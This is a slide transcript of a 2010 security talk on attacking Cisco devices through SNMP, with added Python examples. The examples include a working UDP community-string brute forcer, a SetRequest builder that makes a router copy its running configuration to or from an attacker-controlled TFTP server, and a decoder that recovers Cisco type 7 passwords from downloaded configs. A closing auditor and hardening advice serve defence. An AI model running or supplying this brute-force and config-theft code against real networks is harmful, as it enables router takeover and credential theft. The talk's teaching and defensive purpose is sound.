SNMP : Simple Network Mediated (Cisco) Pwnage

Presentation by Georg-Christian Pranschke (SensePost) at ZaCon 2, 9 October 2010.

This presentation is about SNMP security. It begins with an overview of SNMP, then covers SNMP security weaknesses and SNMP security on Cisco appliances, and closes with Frisk-0, an SNMP hacking tool developed by the presenter.

Published in: Technology

1. SNMP: Simple Network Mediated (Cisco) Pwnage
   Georg-Christian Pranschke, 9 October 2010
2. `whoami`
   - george@sensepost.com
   - "Cheorchie"
3. Agenda
   - How it all began...
   - SNMP?
   - SNMP from a security perspective
   - SNMP on Cisco appliances
   - Exploiting SNMP misconfigurations
   - Frisk-0
   - Secure your SNMP-enabled devices
   - Questions
4. A Long Time Ago...
5. How it all began...
6. SNMP?
7. SNMP?
   - Simple Network Management Protocol
   - Monitor and manage devices on the network: routers, switches, bridges, hubs, IP phones and cameras, printers, computers
8. SNMP?
   - UDP: 161 (requests to the agent) / 162 (traps to the manager)
   - Manager and agent
   - Concepts
     - MIB: Management Information Base
     - OID: Object Identifier
     - PDU: Protocol Data Unit
   - Versions: 1 and 2c vs 3
9. SNMP?
   - Community strings: think passwords
   - Read / write
10. SNMP from a Security Perspective
11. SNMP from a Security Perspective
   - Plain-text protocol
   - UDP: spoofing
   - Every v1/v2c request and response carries the community string in the clear
   - Community strings
     - Defaults: public, private, admin, snmp, snmpd ...
     - Weak communities: 3 characters!
     - Reuse
     - Community schemes
   - User awareness
12. SNMP from a Security Perspective
   - Information disclosure: internal IP addresses, routing information, running processes, running services, installed software, usernames, hardware
   - Compromise
13. Cisco
14. Cisco Appliances
   - Management interfaces: SNMP, TELNET, SSH, HTTP
15. Brute Forcing Cisco Appliances
   - TELNET
     - Often only a password required
     - Only three tries, then reconnect
     - Enable password needs to be brute forced as well
   - SSH
     - Needs username and password (ssh -1)
     - Only three tries per connection
     - Enable password needs to be brute forced as well
   - HTTP(S)
     - Basic authentication
     - Fastest so far
     - No enable password
16. Brute Forcing Cisco Appliances
   - SNMP
     - Almost as fast as we can send UDP packets! (v1/v2c agents silently drop requests with a wrong community, so candidates can be sent without waiting for replies)
     - Just the community string is needed!
     - Privileged access to the device!
17. SNMP on Cisco Appliances
   - Remote configuration through SNMP
     - Setting OIDs
     - Configuration up- and downloads via TFTP
     - Running config vs startup config
18. The Vigenère Cipher
   - Variation of a Caesar cipher (used for Cisco "type 7" passwords in device configurations)
   - Why such a weak cipher?
   - Obfuscation at best
19. Exploiting SNMP Misconfigurations
20. If the RW community is known...
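Slides 8 to 11, 16, 17 and 20 together describe the protocol, the plaintext community string, UDP brute forcing, and configuration transfer through SNMP and TFTP. The Python below is an added worked example written for this transcript; it is not Frisk-0 or any SensePost code. It builds and parses SNMPv1/v2c messages from scratch with a minimal BER encoder so nothing needs installing; the ccCopy OIDs are the real CISCO-CONFIG-COPY-MIB columns, while the router address, candidate communities, TFTP server and filename are made-up lab values.

```python
"""SNMPv1/v2c from scratch: BER encoder, parser, UDP community brute force and a
CISCO-CONFIG-COPY-MIB SetRequest. Added example, not Frisk-0. Lab values are constructed."""
import socket

# ASN.1 BER tags used by SNMP
INTEGER, OCTET_STRING, NULL, OID, SEQUENCE, IPADDRESS = 0x02, 0x04, 0x05, 0x06, 0x30, 0x40
GET_REQUEST, GET_RESPONSE, SET_REQUEST = 0xA0, 0xA2, 0xA3
VERSION = {"1": 0, "2c": 1}
SYS_DESCR = "1.3.6.1.2.1.1.1.0"
# CISCO-CONFIG-COPY-MIB ccCopyEntry (real OIDs); "<column>.<row>" is appended below
CC_COPY = "1.3.6.1.4.1.9.9.96.1.1.1.1."
FILE_TYPE = {"network": 1, "startup": 3, "running": 4}   # ccCopy{Source,Dest}FileType values


def ber_len(n):
    """Definite-form length: one byte below 128, else 0x80|count then the big-endian value."""
    if n < 0x80:
        return bytes([n])
    raw = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(raw)]) + raw


def tlv(tag, payload):
    return bytes([tag]) + ber_len(len(payload)) + payload


def ber_int(v):
    """Non-negative INTEGER in the fewest two's-complement bytes (leading 0x00 if top bit set)."""
    return tlv(INTEGER, v.to_bytes((v.bit_length() + 8) // 8, "big"))


def ber_oid(dotted):
    """OBJECT IDENTIFIER: first two arcs packed as 40*a+b, the rest base-128 with continuation bits."""
    arcs = [int(a) for a in dotted.strip(".").split(".")]
    out = bytearray([40 * arcs[0] + arcs[1]])
    for arc in arcs[2:]:
        chunk = bytearray([arc & 0x7F])
        arc >>= 7
        while arc:
            chunk.insert(0, 0x80 | (arc & 0x7F))
            arc >>= 7
        out += chunk
    return tlv(OID, bytes(out))


def varbind(oid, tag=NULL, value=b""):
    return tlv(SEQUENCE, ber_oid(oid) + tlv(tag, value))


def build_message(version, community, pdu_type, varbinds, request_id=1):
    """Message ::= SEQUENCE { version INTEGER, community OCTET STRING, pdu }. No crypto anywhere."""
    pdu = tlv(pdu_type, ber_int(request_id) + ber_int(0) + ber_int(0)
              + tlv(SEQUENCE, b"".join(varbinds)))
    return tlv(SEQUENCE, ber_int(VERSION[version]) + tlv(OCTET_STRING, community.encode()) + pdu)


def read_tlv(buf, pos=0):
    """Decode one BER element at pos -> (tag, value bytes, position after it)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length


def parse_header(packet):
    """(version, community, pdu_type) of any captured v1/v2c packet: the community is plaintext."""
    _, body, _ = read_tlv(packet)
    _, ver, pos = read_tlv(body)
    _, community, pos = read_tlv(body, pos)
    pdu_type, _, _ = read_tlv(body, pos)
    return int.from_bytes(ver, "big"), community.decode(errors="replace"), pdu_type


def brute_force(host, candidates, version="2c", wait=1.0):
    """Send one GetRequest per candidate without waiting, then collect replies. Agents drop
    requests with a wrong community silently, so every reply echoes a valid community."""
    found = set()
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        for community in candidates:
            s.sendto(build_message(version, community, GET_REQUEST, [varbind(SYS_DESCR)]), (host, 161))
        s.settimeout(wait)
        try:
            while True:
                data, _ = s.recvfrom(4096)
                _, community, pdu_type = parse_header(data)
                if pdu_type == GET_RESPONSE:
                    found.add(community)
        except socket.timeout:
            pass
    return found


def config_copy_varbinds(src, dst, tftp_server, filename, row=1):
    """Varbinds for one ccCopyTable row: copy src to dst, one side being a TFTP file.
    "running" -> "network" pulls the running config; "network" -> "running" pushes one in."""
    return [
        varbind(CC_COPY + f"2.{row}", INTEGER, b"\x01"),                          # ccCopyProtocol = tftp(1)
        varbind(CC_COPY + f"3.{row}", INTEGER, bytes([FILE_TYPE[src]])),          # ccCopySourceFileType
        varbind(CC_COPY + f"4.{row}", INTEGER, bytes([FILE_TYPE[dst]])),          # ccCopyDestFileType
        varbind(CC_COPY + f"5.{row}", IPADDRESS, socket.inet_aton(tftp_server)),  # ccCopyServerAddress
        varbind(CC_COPY + f"6.{row}", OCTET_STRING, filename.encode()),           # ccCopyFileName
        varbind(CC_COPY + f"14.{row}", INTEGER, b"\x04"),                         # ccCopyEntryRowStatus = createAndGo(4)
    ]


if __name__ == "__main__":
    # Constructed lab values: router 10.0.0.1, attacker-controlled TFTP server on 10.0.0.5.
    print("valid communities:", brute_force("10.0.0.1", ["public", "private", "admin", "snmp", "snmpd"]))
    pull = build_message("2c", "private", SET_REQUEST,
                         config_copy_varbinds("running", "network", "10.0.0.5", "r1-running.cfg"))
    print("SetRequest that makes the router upload its running config:", pull.hex())
```

After the SetRequest is sent to UDP/161 with a valid RW community, the router pushes its running configuration to the TFTP server; poll ccCopyState (column 10 of the same row) until it reads successful(3), then set the RowStatus to destroy(6). Swapping the source and destination types pushes a file from the TFTP server into the running or startup configuration instead, which is why a known RW community is the same thing as privileged access. The firing-without-waiting loop in brute_force is what makes SNMP guessing "as fast as we can send UDP packets".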
21. Frisk-0
22. The Lab Environment
23. Frisk-0
   - "Rogue Management Interface"
     - Brute forces community strings
     - Downloads running and startup configurations
     - Extracts all passwords and hashes and decrypts the (Vigenère-obfuscated) passwords
     - Batch mode: from a targets file, network ranges
     - Spoofing capabilities
     - "Configlets" (enable TELNET / reset passwords)
   - Fully automated and unattended
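The cipher of slide 18 and the "extracts and decrypts all passwords" step of slide 23 refer to Cisco "type 7" passwords, which IOS stores XORed against a fixed key stream (a Vigenère variant with a two-digit starting offset). The Python below is an added example for this transcript, not Frisk-0; the key string is the well-known fixed IOS constant, and the configuration excerpt is constructed, its type 5 hash being a made-up value that does not correspond to any password.

```python
"""Cisco type 7 decode/encode plus credential extraction from an IOS config. Added example."""
import re

# Fixed key stream behind IOS "type 7" passwords. It never changes, so the only per-password
# "secret" is the two-digit start offset prefixed to the hex string.
XLAT = "dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"


def decode_type7(enc):
    """'SS' + 2*N hex digits -> plaintext: byte i is XORed with XLAT[(SS + i) % len(XLAT)]."""
    seed = int(enc[:2])
    return "".join(chr(b ^ ord(XLAT[(seed + i) % len(XLAT)]))
                   for i, b in enumerate(bytes.fromhex(enc[2:])))


def encode_type7(plain, seed=9):
    """Inverse of decode_type7; handy for building test configs or password-reset configlets."""
    return f"{seed:02d}" + "".join(f"{ord(c) ^ ord(XLAT[(seed + i) % len(XLAT)]):02X}"
                                   for i, c in enumerate(plain))


CRED_RE = re.compile(r"\b(password|secret)\s+([057])\s+(\S+)")


def extract_credentials(config):
    """Return (section, kind, type, stored value, recovered plaintext) for every credential line.
    Type 0 is cleartext, type 7 is reversible, type 5 (MD5-crypt) is left for offline cracking."""
    section, found = "global", []
    for line in config.splitlines():
        if not line.strip() or line.startswith("!"):
            continue
        if not line[0].isspace():
            section = line.strip()   # an unindented command opens a block (line vty 0 4, interface ...)
        m = CRED_RE.search(line)
        if not m:
            continue
        kind, ptype, value = m.groups()
        if ptype == "7":
            plain = decode_type7(value)
        elif ptype == "0":
            plain = value
        else:
            plain = None
        found.append((section, kind, ptype, value, plain))
    return found


# Constructed running-config excerpt; the type 5 hash is a made-up string, not a real hash.
SAMPLE_CONFIG = """\
hostname r1
enable secret 5 $1$4kZf$7uJ2x3q9pYl0bWc1dVe8a/
enable password 7 094F471A1A0A
username admin privilege 15 password 7 03055F060F01
snmp-server community private RW
line vty 0 4
 password 7 120304141D05
 login
"""

if __name__ == "__main__":
    for section, kind, ptype, value, plain in extract_credentials(SAMPLE_CONFIG):
        print(f"{section:45} {kind:8} type {ptype}  {value}  -> {plain or 'crack offline'}")
```

Everything the router wrote as `password 7` comes back in cleartext instantly, which is why a downloaded running config is as good as the enable password and every VTY password on the box. Only `secret 5` values need real cracking, and even those are unsalted-strength MD5-crypt, so they belong in a password cracker rather than in the "nothing to see here" bucket.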
24. Frisk-0
25. The GREnd Finale
   - GRE: Generic Routing Encapsulation
26. Secure your SNMP enabled devices
27. Secure Your SNMP Enabled Devices
   - Do you really need SNMP?
   - Do you really need an RW community?
   - Set strong community strings: 40+ characters? Why not!
   - Access-lists
     - SNMP
     - TFTP! (spoofing)
     - UDP
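A checker for the advice in slide 27, using the default-community list from slide 11, added here as an example rather than anything from the talk: it reads IOS `snmp-server community` lines and flags default or short strings, RW communities, and communities without a defined access-list. Both configurations and the 42-character community string are constructed.

```python
"""Audit IOS snmp-server community lines against the hardening points in the talk. Added example."""
import re

DEFAULT_COMMUNITIES = {"public", "private", "admin", "snmp", "snmpd"}   # the slide 11 list
# IOS syntax handled: snmp-server community <string> [view <name>] [RO|RW] [<acl>]
COMMUNITY_RE = re.compile(
    r"^snmp-server community (?P<name>\S+)(?: view \S+)?(?: (?P<mode>RO|RW))?(?: (?P<acl>\S+))?\s*$",
    re.M)


def acl_defined(config, acl):
    """Is a numbered ('access-list 10 ...') or named ('ip access-list standard NMS') ACL present?"""
    pattern = rf"^(?:ip )?access-list (?:standard |extended )?{re.escape(acl)}\b"
    return re.search(pattern, config, re.M) is not None


def audit_snmp(config, min_len=40):
    """Return (community, problem) pairs; an empty list means none of the talk's warnings apply."""
    findings = []
    for m in COMMUNITY_RE.finditer(config):
        name, mode, acl = m["name"], m["mode"] or "RO", m["acl"]   # IOS defaults to RO
        if name.lower() in DEFAULT_COMMUNITIES:
            findings.append((name, "default community string"))
        elif len(name) < min_len:
            findings.append((name, f"short community string ({len(name)} chars, want {min_len}+)"))
        if mode == "RW":
            findings.append((name, "RW community: whoever has it can rewrite the configuration"))
        if acl is None:
            findings.append((name, f"{mode} community reachable from any source (no access-list)"))
        elif not acl_defined(config, acl):
            findings.append((name, f"access-list {acl} referenced but not defined"))
    return findings


# Constructed configurations: the weak one as commonly found, the hardened one following slide 27.
WEAK_CONFIG = """\
snmp-server community public RO
snmp-server community private RW
"""

HARDENED_CONFIG = """\
access-list 10 permit host 10.0.0.5
access-list 10 deny any log
snmp-server community 7kQ2vN9xLp4sWc8bRt1yHm6zJf3gDe5aUo0iVb2nXq RO 10
! no RW community at all: configuration changes go over SSH, not SNMP and TFTP
"""

if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(label, audit_snmp(cfg) or "no findings")
```

The access-list check only covers the SNMP side; the slide's point about TFTP still stands, because the TFTP server the router talks to during a config copy is named by the attacker in the SetRequest, so the UDP filtering has to happen on the network as well as in the device's own ACL.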
28. Questions?
